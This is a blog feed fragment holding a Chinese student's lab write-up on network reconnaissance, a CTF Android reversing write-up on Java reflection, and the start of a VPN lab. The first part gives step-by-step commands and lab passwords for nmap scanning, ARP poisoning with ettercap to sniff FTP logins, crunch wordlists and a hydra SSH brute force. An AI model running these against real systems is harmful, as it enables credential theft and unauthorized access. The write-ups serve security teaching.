Linux</td><td>192.168.1.2</td><td>操作机</td><td>用户名：root；密码：Simplexue123</td></tr><tr><td>CentOS7</td><td>192.168.1.3</td><td>目标机</td><td>用户名：root；密码：Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.1.4</td><td>目标机</td><td>用户名：administrator；密码：Simplexue123</td></tr></tbody></table><h1 id="四-实验步骤"><a href="#四-实验步骤" class="headerlink" title="四. 实验步骤"></a>四. 实验步骤</h1><h2 id="任务一-使用nmap、ettercap进行网络侦查和密码嗅探"><a href="#任务一-使用nmap、ettercap进行网络侦查和密码嗅探" class="headerlink" title="任务一 使用nmap、ettercap进行网络侦查和密码嗅探"></a>任务一 使用nmap、ettercap进行网络侦查和密码嗅探</h2><h3 id="【任务描述】"><a href="#【任务描述】" class="headerlink" title="【任务描述】"></a>【任务描述】</h3><p>本实验任务基于真实企业网络环境，在三台服务器搭建的典型企业局域网环境中，主要完成以下内容：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用kali集成的扫描工具nmap，对网络进行探测，收集目标网络存活的主机信息，收集主机开放的服务信息。</span><br><span class="line">利用kali集成的嗅探工具ettercap，对FTP服务进行嗅探，获取目标主机的ftp登录密码（提交嗅探到的ftp登录密码）。</span><br></pre></td></tr></table></figure><p>通过完成本实验任务，要求学生掌握利用nmap进行网络探测并获取目标主机开放的服务等关键信息的方法；掌握通过ettercap实现对目标主机的服务如ftp进行嗅探的流程、方法和技巧，为完成后续网络侦查和漏洞利用实验任务奠定坚实的网络探测技术基础。</p><h3 id="【实验目标】"><a href="#【实验目标】" class="headerlink" title="【实验目标】"></a>【实验目标】</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">了解网络侦查、信息收集、漏洞挖掘和利用的基本概念以及常用的信息收集和安全漏洞扫描工具，认知常见的网络侦查手段和企业网络安全漏洞。</span><br><span class="line">掌握nmap工具的功能和操作方法，并能够分析检侧结果，能够运用这些工具解决目标网络信息探测、漏洞挖掘等常见的安全问题。</span><br><span class="line">了解ettercap嗅探工具的基本功能，掌握常见的嗅探相关服务和应用的用户名和密码的方法。</span><br></pre></td></tr></table></figure><p>通过nmap、ettercap等工具的学习和使用，能够举一反三，掌握自主学习企业级网络扫描工具功能、操作技巧、检测结果分析、网络侦查、漏洞挖掘的常用方法，最终具备企业复杂网络侦查、漏洞挖掘和信息系统安全管理的职业能力。</p><h3 id="【实验工具】-1"><a href="#【实验工具】-1" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>Nmap（集成于kali linux）</li><li>ettercap（集成于kali linux）</li></ul><h3 id="【操作步骤】"><a href="#【操作步骤】" class="headerlink" title="【操作步骤】"></a>【操作步骤】</h3><p>1.1 开启操作机kali linux后进入命令行界面，输入用户名（root）和密码（Simplexue123）进行登录，输入startx切换到图形界面。右键单击桌面，选择“打开终端”，</p><p>1.2 输入命令“ifconfig”,查看本机IP地址为192.168.1.2，</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121110233585.png" alt="image-20241121110233585"></p><p>图1-2</p><p>1.3 输入命令“nmap –sP –PT –PI 192.168.1.0&#x2F;24”，扫描192.168.1.0网段的存活主机，由扫描结果可知局域网内有两台主机192.168.1.3和192.168.1.4可以通信，如图1-3所示。</p><p>注意：如果扫描长时间不出结果，或者操作机kali linux有多个网卡，需使用-e参数指定192.168.1.2对应的网卡，网卡名称视实际情况而定，假设为eth0，则使用命令“nmap -sP -PI -PT 192.168.1.0&#x2F;24 -e eth0”进行扫描。若以下遇到类似的问题，可使用该方法解决。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121110341307.png" alt="image-20241121110341307"></p><p>图1-3</p><blockquote><p>Nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（亦称为fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。</p></blockquote><p>1.4 输入命令“nmap -sV 192.168.1.3”,对主机192.168.1.3扫描，显示主机开放的端口和操作系统类型Unix<strong>（扫描端口和操作系统类型的目的是为了发现是否存在可以利用的漏洞）</strong>，如图1-4所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121110414503.png" alt="image-20241121110414503"></p><p>图1-4</p><p>1.5 输入命令“nmap -sV 192.168.1.4”, 对主机192.168.1.4扫描，显示主机开放端口80和3389，表示有可能开放www和远程桌面服务<strong>（www服务一般都会部署web站点，可以通过寻找站点的漏洞拿到服务器的权限，拿到服务器权限后，可以通过远程连接服务登录到服务器上进行任意操作）</strong>，如图1-5所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121110743190.png" alt="image-20241121110743190"></p><p>图1-5</p><p>1.6 输入命令“nmap -O 192.168.1.4”,探测到目标主机的OS为windows2012，如图1-6所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121110936858.png" alt="image-20241121110936858"></p><p>图1-6</p><p>1.7 单击”Applications”-&gt;”Sniffing&amp;Spoofing”-&gt;”ettercap-graphical”,打开ettercap嗅探工具</p><p>图1-7</p><p>1.8 单击“Sniff”-〉“Unified sniffing”,执行标准嗅探功能</p><blockquote><p>Ettercap是中间人攻击的综合套件。它具有嗅探活连接，动态内容过滤和许多其他有趣的技巧。它支持许多协议的主动和被动解剖，并包含许多用于网络和主机分析的功能。</p></blockquote><p>1.9 选择要监听网卡“eth1”，单击“OK”按钮<strong>（eth0,eth1都有可能是被监听的网卡，需要选择的是192.168.1.2同网段的网卡）</strong></p><p>1.10 单击“Hosts”-〉“Scan for hosts”，扫描存活主机</p><p>1.11 单击“Hosts”-〉“hosts list”，打开主机列</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111153067.png" alt="image-20241121111153067"></p><p>1.12 存活主机为192.168.1.3(开放ssh、ftp服务)和192.168.1.4</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180417162659_54140.png" alt="img"></p><p>1.13 单击主机192.168.1.3，然后单击“Add to Target1”，把主机192.168.1.3当做网关</p><p>1.14 单击主机192.168.1.4，然后单击“Add to Target2”，把主机192.168.1.4当做嗅探对象</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111337903.png" alt="image-20241121111337903"></p><p>1.15 单击“Mitm”-&gt;“ARP poisoning”，开启arp欺骗(注意此时需要输入命令”more &#x2F;proc&#x2F;sys&#x2F;net&#x2F;ipv4&#x2F;ip_forward”,查看路有转发是否开启，如果数值为0，输入命令“echo 1 &gt; &#x2F;proc&#x2F;sys&#x2F;net&#x2F;ipv4&#x2F;ip_forward”)，开启转发功能</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111444633.png" alt="image-20241121111444633"></p><p>1.16 选择“Sniff remote connections”,单击“ok”按钮，监听远程连接，如图1-16所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180417162740_50795.png" alt="img"></p><p>图1-16</p><p>1.17 单击“Plugins”-&gt;“Manage the plugins”,打开插件对话框</p><p>1.18 单击“chk_poison“,检测嗅探是否成功</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111546731.png" alt="image-20241121111546731"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111620335.png" alt="image-20241121111620335"></p><p>1.19 单击“Start“-&gt;”Start sniffing”, 开始嗅探网络内的数据包（默认已经开启了可跳过此步骤），如图1-19所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/chapter_20180417162808_71719.png" alt="img"></p><p>图1-19</p><blockquote><p>提示：此嗅探操作由于网络连接状况、sniffer工具嗅探性能等不可预知原因，嗅探时间可能会稍长（大约5分钟左右）</p></blockquote><p>1.20 嗅探到ftp登陆帐号后会将账户密码在控制台中打印出来<img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111658834.png" alt="image-20241121111658834"></p><p>图1-20</p><p>1.21 打开终端,输入命令”ftp 192.168.1.3”回车后会提示输入用户名密码，将嗅探到的账户密码输入完成后台会提示登录状态，如图1-21所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121111753119.png" alt="image-20241121111753119"></p><h3 id="【实验结果提交】"><a href="#【实验结果提交】" class="headerlink" title="【实验结果提交】"></a>【实验结果提交】</h3><blockquote><p>将嗅探到的ftp登陆密码作为实验结果提交，提交成功后该实验任务完成。</p></blockquote><h2 id="任务二-使用crunch、hydra暴力破解ssh服务登陆密码"><a href="#任务二-使用crunch、hydra暴力破解ssh服务登陆密码" class="headerlink" title="任务二 使用crunch、hydra暴力破解ssh服务登陆密码"></a>任务二 使用crunch、hydra暴力破解ssh服务登陆密码</h2><h3 id="【任务描述】-1"><a href="#【任务描述】-1" class="headerlink" title="【任务描述】"></a>【任务描述】</h3><p>本实验任务在三台服务器搭建的典型企业局域网环境中，主要完成以下内容：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用kali集成的crunch工具，生成密码字典文件。</span><br><span class="line">使用hydra工具暴力破解ssh服务的登陆密码，以便完全控制目标主机系统。</span><br></pre></td></tr></table></figure><p>通过完成本实验任务，要求学生掌握服务密码破解原理、技术和工具的使用方法，具备娴熟的系统服务密码破解、漏洞挖掘和利用、信息安全管理和防范的职业能力。</p><h3 id="【实验目标】-1"><a href="#【实验目标】-1" class="headerlink" title="【实验目标】"></a>【实验目标】</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">了解crunch的基本功能，掌握利用crunch生成密码字典文件的方法。</span><br><span class="line">了解hydra密码爆破工具的基本功能和使用方法，掌握常见的爆破服务和应用的用户名和密码的方法。</span><br></pre></td></tr></table></figure><p>通过crunch和hydra等工具的学习和使用，掌握字典文件的生成、破解密码等常用的漏洞挖掘和利用技术，具备熟练的漏洞挖掘和防攻击能力。</p><h3 id="【实验工具】-2"><a href="#【实验工具】-2" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>crunch（集成于kali linux）</li><li>hydra（集成于kali linux）</li></ul><h3 id="【操作步骤】-1"><a href="#【操作步骤】-1" class="headerlink" title="【操作步骤】"></a>【操作步骤】</h3><p>2.1 在终端中输入命令”crunch 9 9 hacker + 123456 -t @@@@@@%%% -o &#x2F;root&#x2F;password.txt” (或者” crunch 9 9 hacker + “245” -t hacker%%%” –o &#x2F;root&#x2F;password.txt), crunch在&#x2F;root&#x2F;目录下生成password.txt字典文件，如图2-1所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121113025471.png" alt="image-20241121113025471"></p><p>图2-1</p><blockquote><p>crunch是一款linux下的压缩后仅仅38k的小程序，Crunch最厉害的是知道密码的一部分细节后，可以针对性的生成字典，这在渗透中特别有用，用来进行暴力破解攻击效果尤佳。</p></blockquote><p>2.2 在终端中输入命令”hydra -l hacker -P &#x2F;root&#x2F;password.txt 192.168.1.3 ssh”，如图2-2所示。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121113230331.png" alt="image-20241121113230331"></p><p>为什么呢，没有找到</p><p>甚至刚刚生成密码用的第一个指令，也是跑了很久显示无法找到账号密码</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121114138414.png" alt="image-20241121114138414"></p><p>乐，生成错密码了，应该是上面那个命令，（orz跪了</p><h3 id="【实验结果提交】-1"><a href="#【实验结果提交】-1" class="headerlink" title="【实验结果提交】"></a>【实验结果提交】</h3><blockquote><p>将hydra破解的密码作为实验结果提交，提交成功后该实验任务完成。</p></blockquote><h2 id="任务三-使用ssh登录目标机并获取key值，获得敏感信息"><a href="#任务三-使用ssh登录目标机并获取key值，获得敏感信息" class="headerlink" title="任务三 使用ssh登录目标机并获取key值，获得敏感信息"></a>任务三 使用ssh登录目标机并获取key值，获得敏感信息</h2><h3 id="【任务描述】-2"><a href="#【任务描述】-2" class="headerlink" title="【任务描述】"></a>【任务描述】</h3><p>本实验任务在任务二操作完成的基础上，远程连接目标机，获得敏感信息。</p><p>通过完成本实验任务，要求学生理解SSH的概念和工作原理，掌握使用ssh服务远程连接目标机并获取目标机敏感信息的方法，具备SSH服务安全管理和维护职业能力。</p><h3 id="【实验目标】-2"><a href="#【实验目标】-2" class="headerlink" title="【实验目标】"></a>【实验目标】</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">理解SSH的概念和工作原理.</span><br><span class="line">掌握使用ssh远程连接目标机并获取目标机敏感信息的方法。</span><br><span class="line">具备信息系统SSH服务安全管理和防范能力。</span><br></pre></td></tr></table></figure><h3 id="【实验工具】-3"><a href="#【实验工具】-3" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>ssh</li><li>linux命令：ls、more</li></ul><h3 id="【操作步骤】-2"><a href="#【操作步骤】-2" class="headerlink" title="【操作步骤】"></a>【操作步骤】</h3><p>在终端中输入命令”ssh hacker<code>@</code>192.168.1.3”，输入密码hacker123，输入命令ls查看当前目录下的文件，可知有1.key，输入命令more 1.key，获得key1<img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241121113834832.png" alt="image-20241121113834832"></p><h1 id="五．实验思考题："><a href="#五．实验思考题：" class="headerlink" title="五．实验思考题："></a>五．实验思考题：</h1><h3 id="（1）SSH协议的功能和特点"><a href="#（1）SSH协议的功能和特点" class="headerlink" title="（1）SSH协议的功能和特点"></a>（1）SSH协议的功能和特点</h3><p>SSH（Secure Shell）是一种用于在不安全的网络环境中进行安全通信的协议，提供了加密的通信隧道，常用于远程登录和其他安全网络服务。其主要功能包括：</p><ol><li><strong>远程登录</strong>：通过加密的方式登录远程服务器。</li><li><strong>数据传输</strong>：支持安全的数据传输（如SCP和SFTP）。</li><li><strong>命令执行</strong>：允许在远程服务器上执行命令。</li><li><strong>隧道转发</strong>：可通过端口转发实现对其他服务的加密访问。</li></ol><h4 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h4><ol><li><strong>高安全性</strong><ul><li>使用加密技术（如对称加密、非对称加密和哈希算法）保护通信数据的机密性和完整性。</li><li>提供身份验证机制，如口令认证和基于密钥的认证。</li></ul></li><li><strong>跨平台</strong>：支持Linux、Windows、macOS等多种操作系统。</li><li><strong>可扩展性</strong>：支持插件和其他加密算法的集成。</li><li><strong>替代性</strong>：可替代早期的Telnet、Rlogin等不安全的协议。</li><li><strong>防中间人攻击</strong>：通过公钥机制验证主机身份，防止被中间人攻击。</li></ol><hr><h3 id="（2）口令PoJie的分类及原理"><a href="#（2）口令PoJie的分类及原理" class="headerlink" title="（2）口令PoJie的分类及原理"></a>（2）口令PoJie的分类及原理</h3><h4 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h4><ol><li><strong>暴力破解</strong>：<ul><li><strong>原理</strong>：逐一尝试所有可能的密码组合，直到找到正确的密码。常使用字典或穷举法。</li><li><strong>特点</strong>：耗时长，但适用于任何密码。</li><li><strong>工具</strong>：如Hydra、John the Ripper等。</li></ul></li><li><strong>字典攻击</strong>：<ul><li><strong>原理</strong>：基于预先准备好的常用密码列表（字典）进行匹配尝试。</li><li><strong>特点</strong>：速度快，但对强密码无效。</li><li><strong>工具</strong>：如Hashcat、Cain and Abel。</li></ul></li><li><strong>彩虹表攻击</strong>：<ul><li><strong>原理</strong>：利用预计算的密码哈希值表进行快速匹配。</li><li><strong>特点</strong>：适合破解哈希值，但对加盐的哈希无效。</li><li><strong>工具</strong>：如RainbowCrack。</li></ul></li><li><strong>社工攻击（Social Engineering Attack）</strong>：<ul><li><strong>原理</strong>：通过心理操纵或信息搜集诱导用户提供密码。</li><li><strong>特点</strong>：无需技术破解，但依赖对目标的了解。</li><li><strong>方式</strong>：如钓鱼攻击、电话欺诈等。</li></ul></li><li><strong>中间人攻击（MITM）结合捕获</strong>：<ul><li><strong>原理</strong>：拦截目标与服务器之间的通信，获取明文密码或加密数据。</li><li><strong>特点</strong>：需要有条件接入目标网络。</li><li><strong>工具</strong>：如Wireshark、Ettercap。</li></ul></li></ol><h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><ul><li>密码存储与验证<ul><li>密码通常以加密形式存储在系统中（如哈希值）。</li><li>破解的目的是通过逆向或猜测方式找到哈希对应的原始密码。</li></ul></li><li>加密算法的作用<ul><li>哈希算法（如MD5、SHA-256）保护密码的机密性。</li><li>盐（Salt）可以抵抗彩虹表攻击。</li></ul></li></ul><p>破解方法依赖于目标密码的强度、存储机制和攻击者的计算能力。</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;一．实验名称：网络侦察实验&quot;&gt;&lt;a href=&quot;#一．实验名称：网络侦察实验&quot; class=&quot;headerlink&quot; title=&quot;一．实验名称：网络侦察实验&quot;&gt;&lt;/a&gt;一．实验名称：网络侦察实验&lt;/h1&gt;&lt;h3 id=&quot;【实验描述】&quot;&gt;&lt;a href=&quot;#【实验</summary>
      
    
    
    
    
    <category term="笔记" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/%E7%AC%94%E8%AE%B0/"/>
    
  </entry>
  
  <entry>
    <title>2021 D3CTF |Reverse | No Name</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/20/2021-d3ctf-reverse-no-name/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/20/2021-d3ctf-reverse-no-name/</id>
    <published>2024-11-20T11:59:16.072Z</published>
    <updated>2024-12-16T03:45:01.840Z</updated>
    
    <content type="html"><![CDATA[<h1 id="2021-D3CTF-Reverse-No-Name"><a href="#2021-D3CTF-Reverse-No-Name" class="headerlink" title="2021 D3CTF |Reverse | No Name"></a>2021 D3CTF |Reverse | No Name</h1><p>在群里看到有同学问这个题目，本身mobile逆向学的稀烂，通过这道题识图开天辟地！</p><p>也提到了JAVA反射</p><blockquote><p>出题者曰：<strong>题⽬使⽤ Java  的反射特性，运⾏时把⽤来混淆做题者的验证接口替换为真实验证代码。</strong>验证相关代码被 通过 AES  加密存放在 assets  ⾥，运⾏时从 native  中获取密钥解密。 native  中存在反调试，但看了  writeup  才反应过来，直接写⼀个 app  调⽤⼀下获取 KEY  的函数就可以解密了， native  ⾥⾯的反调试， 防 patch  根本没什么作⽤。解密出来代码⾮常简单，就是抑或⼀下</p></blockquote><h2 id="我们来看什么是JAVA反射特性："><a href="#我们来看什么是JAVA反射特性：" class="headerlink" title="我们来看什么是JAVA反射特性："></a>我们来看什么是JAVA反射特性：</h2><h4 id="一个例子："><a href="#一个例子：" class="headerlink" title="一个例子："></a>一个例子：</h4><p>通过这种方式，当我们需要访问其他类的时候，不需要改动源码，利用反射，直接修改配置文件即可。</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">FileDemo</span> &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line"><span class="type">Class</span> <span class="variable">aClass</span> <span class="operator">=</span> Class.forName(getValue(<span class="string">&quot;className&quot;</span>));</span><br><span class="line"></span><br><span class="line"><span class="type">Method</span> <span class="variable">m</span> <span class="operator">=</span> aClass.getMethod(getValue(<span class="string">&quot;methodName&quot;</span>));</span><br><span class="line"></span><br><span class="line">m.invoke(aClass.getConstructor().newInstance());</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//这个方法用于接收配置文件中与key所对应的value值</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">getValue</span><span class="params">(String key)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line"><span class="type">Properties</span> <span class="variable">pro</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Properties</span>();   <span class="comment">//获取配置文件的对象</span></span><br><span class="line"></span><br><span class="line"><span class="type">FileReader</span> <span class="variable">reader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileReader</span>(<span class="string">&quot;prop.txt&quot;</span>);</span><br><span class="line">pro.load(reader);  <span class="comment">//将流加载到配置文件对象中</span></span><br><span class="line">        <span class="comment">//从输入流中读取属性列表（键和元素对）。通过对指定的文件（比如说上面的 prop.txt 文件）进行装载来获取该文件中的所有键 - 值对。以供 getProperty ( String key) 来搜索。</span></span><br><span class="line"></span><br><span class="line">reader.close();</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> pro.getProperty(key);<span class="comment">//用指定的键在此属性列表中搜索属性。也就是通过参数 key ，得到 key 所对应的 value。</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//prop.txt文件中的内容</span></span><br><span class="line">className=fanshe.file.Apple</span><br><span class="line">methodName=taste           </span><br><span class="line"><span class="comment">//Apple类</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Apple</span> &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">taste</span><span class="params">()</span> &#123;</span><br><span class="line">System.out.println(<span class="string">&quot;苹果真好吃啊...&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//输出：</span></span><br><span class="line">苹果真好吃啊...</span><br></pre></td></tr></table></figure><p>首先定位主函数：<br><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120221441387.png" alt="image-20241120221441387"></p><p>这里有一个明显的函数：<br><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120221922464.png" alt="image-20241120221922464"></p><p>是AES<img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120221938414.png" alt="image-20241120221938414"></p><p>首先查看<code>extends Application</code>的类会发现有一个非常明显的<code>AES</code>解密<code>data.enc</code>并且保存为<code>/data/user/0/com.d3ctf.noname/data.jar</code>文件，同时将<code>FlagChecker</code>的<code>mFlagChecker</code>变量赋值为<code>com.d3ctf.noname.A</code>类的实例。</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120224138608.png" alt="image-20241120224138608"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;2021-D3CTF-Reverse-No-Name&quot;&gt;&lt;a href=&quot;#2021-D3CTF-Reverse-No-Name&quot; class=&quot;headerlink&quot; title=&quot;2021 D3CTF |Reverse | No Name&quot;&gt;&lt;/a&gt;2021 </summary>
      
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
  <entry>
    <title>网络安全综合设计作业</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/11/20/vpn-shi-yan/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/11/20/vpn-shi-yan/</id>
    <published>2024-11-20T04:15:57.191Z</published>
    <updated>2024-12-16T03:44:52.625Z</updated>
    
    <content type="html"><![CDATA[<h1 id="VPN实验"><a href="#VPN实验" class="headerlink" title="VPN实验"></a>VPN实验</h1><h3 id="【实验描述】"><a href="#【实验描述】" class="headerlink" title="【实验描述】"></a>【实验描述】</h3><p>虚拟专用网（VPN）被定义为通过一个公用网络（通常是因特网）建立一个临时的、安全的连接，是一条穿过混乱的公用网络的安全、稳定的隧道。虚拟专用网是对企业内部网的扩展。虚拟专用网可以帮助远程用户、公司分支机构、商业伙伴及供应商同公司的内部网建立可信的安全连接，并保证数据的安全传输。虚拟专用网可用于不断增长的移动用户的全球因特网接入，以实现安全连接；可用于实现企业网站之间安全通信的虚拟专用线路，用于经济有效地连接到商业伙伴和用户的安全外联网虚拟专用网。</p><p>本实验内容共包含3个子任务，分别是：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">任务一 使用IP命令搭建基于隧道的虚拟专有网络</span><br><span class="line">任务二 使用加密工具OpenSSL创建加密密钥</span><br><span class="line">任务三 SSL VPN之OpenVPN的安装配置</span><br></pre></td></tr></table></figure><h3 id="【实验目的】"><a href="#【实验目的】" class="headerlink" title="【实验目的】"></a>【实验目的】</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">掌握如何搭建基于隧道的虚拟专有网络</span><br><span class="line">掌握加密算法了解及其应用</span><br><span class="line">掌握如何安装部署配置openvpn服务端与客户端</span><br></pre></td></tr></table></figure><h3 id="【实验工具】"><a href="#【实验工具】" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>IP</li><li>Openssl</li><li>Ipsec</li><li>ovs-vsctl</li><li>openvpn</li><li>tcpdump</li><li>sysctl</li><li>modprobe</li><li>iptables</li></ul><h3 id="【实验环境】"><a href="#【实验环境】" class="headerlink" title="【实验环境】"></a>【实验环境】</h3><table><thead><tr><th>操作系统</th><th>IP地址</th><th>服务器角色</th><th>登录账户密码</th></tr></thead><tbody><tr><td>Windows2012</td><td>192.168.0.11</td><td>操作机</td><td>用户名：administrator；密码：Simplexue123</td></tr><tr><td>centos7_1</td><td>192.168.1.11</td><td>目标机</td><td>用户名：root；密码：Simplexue123</td></tr><tr><td>centos7_2</td><td>192.168.2.11</td><td>目标机</td><td>用户名：administrator；密码：Simplexue123</td></tr></tbody></table><p><strong>主要操作对象是Windows2012，其他两台电脑是远程连接。</strong></p><h2 id="任务一、使用IP命令搭建基于隧道的虚拟专有网络"><a href="#任务一、使用IP命令搭建基于隧道的虚拟专有网络" class="headerlink" title="任务一、使用IP命令搭建基于隧道的虚拟专有网络"></a>任务一、使用IP命令搭建基于隧道的虚拟专有网络</h2><h3 id="【任务描述】"><a href="#【任务描述】" class="headerlink" title="【任务描述】"></a>【任务描述】</h3><p>本实验任务基于真实企业网络环境，在两台不同网络环境的环境中，主要完成以下内容：</p><p><strong>实现两不同网络内的内网通过ip隧道使之互通并检测。</strong></p><h3 id="【实验目标】"><a href="#【实验目标】" class="headerlink" title="【实验目标】"></a>【实验目标】</h3><p>了解企业网络环境如何使不同网络之间内网互通。<br>掌握ip 命令的使用。<br>掌握虚拟私有网络实现方法。</p><h3 id="【实验工具】-1"><a href="#【实验工具】-1" class="headerlink" title="【实验工具】"></a>【实验工具】</h3><ul><li>ip</li><li>modprobe</li></ul><h3 id="【操作步骤】"><a href="#【操作步骤】" class="headerlink" title="【操作步骤】"></a>【操作步骤】</h3><h3 id="操作步骤"><a href="#操作步骤" class="headerlink" title="操作步骤"></a>操作步骤</h3><p>1.双击桌面Xshell5图标，在弹出的界面登陆主机192.168.1.11和192.168.2.11这两台主机.密码为Simplexue123</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120110436700.png" alt="image-20241120110436700"></p><p><strong>（注意这里是直接在命令行SSH链接，不是上面的新建））</strong></p><p>分别修改主机名：</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">hostnamectl set-hostname vpn1</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">hostnamectl set-hostname vpn2</span></span><br></pre></td></tr></table></figure><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120111108850.png" alt="image-20241120111108850"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241120111121238.png" alt="image-20241120111121238"></p><p>2.vpn1和vpn2主机分别加载gre内核模块并检查</p><p>加载ip_gre内核模块</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[root@vpn1 ~]# modprobe ip_gre</span><br></pre></td></tr></table></figure><p>查询ip_gre模块是否加载，如图所示已正常加载</p><figure class="highlight 